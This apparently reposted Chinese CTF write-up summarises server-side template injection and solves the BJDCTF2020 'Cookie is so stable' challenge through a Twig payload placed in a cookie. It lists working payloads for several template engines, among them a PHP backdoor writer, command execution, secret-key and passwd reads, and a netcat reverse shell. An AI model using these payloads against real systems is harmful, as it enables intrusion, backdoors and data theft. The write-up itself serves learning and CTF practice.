当前位置:网站首页>SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable
SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable
2022-07-25 11:47:00 【一只Traveler】
知识点:
模板注入漏洞总结:参考:很全的总结:一篇文章带你理解漏洞之 SSTI 漏洞 | K0rz3n's Blog
1.常用的模板引擎
PHP:smarty Twig Blade;
python : jinja2 django tornado
java : JSP FreeMarker Velocity
当在服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题.
具体看参考;下面讲使用;
使用:
Tplmap的安装与用法(内包含解决缺少库报错的处理教程)_小 白 萝 卜的博客-CSDN博客_tplmap
Twig
{ {7*‘7’}} 输出49
Jinja
{ {7*‘7’}}输出7777777
攻击:
攻击方向:
找到模板注入主要从三个方向进行攻击
(1)模板本身
(2)框架本身
(3)语言本身
1.模板本身;
(1)Smarty
payload
打开文件:
{self::getStreamVariable("file:///proc/self/loginuid")}写后门:
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}(2)Twig
payload:其中id是命令;
{
{_self.env.registerUndefinedFilterCallback("exec")}}{
{_self.env.getFilter("id")}}(3)freeMarker
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }2.利用框架本身的特性进行攻击
1).Django
http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}
http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}
2).Flask/Jinja2
config 是Flask模版中的一个全局对象,它代表“当前配置对象(flask.config)”,它是一个类字典的对象,它包含了所有应用程序的配置值。在大多数情况下,它包含了比如数据库链接字符串,连接到第三方的凭证,SECRET_KEY等敏感值。虽然config是一个类字典对象,但是通过查阅文档可以发现 config 有很多神奇的方法:from_envvar, from_object, from_pyfile, 以及root_path。
{
{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
//写文件
{
{ config.from_pyfile('/tmp/evil') }}
//加载system
{
{ config['SHELL']('nc xxxx xx -e /bin/sh') }}
//执行命令反弹SHELL3).Tornado
http://117.78.26.79:31093/error?msg={
{handler.settings}}3.利用模语言本身的特性进行攻击
1)python
2).JAVA
payload:
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}当然要是文件操作就要用另外的类了,思路是不变的
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
回到题目:
在flag界面输入{ {7*7}}
回显49;
存在模板注入;
题目提示cookie;
抓包看看:也可以F12 网络查看数据包发现;

有一个set-cookie;
也就是模板注入的地方:
先使用sytem()试试;

不行,再看看这是什么类型的注入:
使用{ {7*'7'}} 还是回显49,看来是Twig;
直接上payload:
{ {_self.env.registerUndefinedFilterCallback("exec")}}{ {_self.env.getFilter("cat /flag")}}
(要在第二个数据包中构造cookie的user;下图是第一个,在参数username直接构造不是不行的)

可以用F12看看数据包:


边栏推荐
- 通过Referer请求头实现防盗链
- monit安装和使用
- 2022河南萌新联赛第(三)场:河南大学 I - 旅行
- 水博士2
- R language ggplot2 visualization: use the ggviolin function of ggpubr package to visualize the violin graph, set the add parameter to add jitter data points and mean standard deviation vertical bars (
- 【黑马早报】运营23年,易趣网宣布关停;蔚来对大众CEO抛出橄榄枝;华为天才少年曾放弃360万年薪;尹烨回应饶毅炮轰其伪科学...
- 从云原生到智能化,深度解读行业首个「视频直播技术最佳实践图谱」
- 基于Caffe ResNet-50网络实现图片分类(仅推理)的实验复现
- 【ROS进阶篇】第九讲 URDF的编程优化Xacro使用
- 推荐系统-协同过滤在Spark中的实现
猜你喜欢
随机推荐
【二】栅格数据显示拉伸色带(以DEM数据为例)
Eureka registration center opens password authentication - record
【七】图层显示和标注
aaaaaaaaaaA heH heH nuN
pytorch环境配置及基础知识
Hystrix使用
RestTemplate与Ribbon简单使用
给生活加点惊喜,做创意生活的原型设计师丨编程挑战赛 x 选手分享
【6】 Map box settings
919. 完全二叉树插入器 : 简单 BFS 运用题
推荐系统-协同过滤在Spark中的实现
Eureka注册中心开启密码认证-记录
WPF项目入门1-简单登录页面的设计和开发
Microsoft azure and Analysys jointly released the report "Enterprise Cloud native platform driven digital transformation"
【五】页面和打印设置
水博士2
【十一】矢量、栅格数据图例制作以及调整
Musk's "eternal soul": half hype, half flicker
技术管理杂谈
从云原生到智能化,深度解读行业首个「视频直播技术最佳实践图谱」








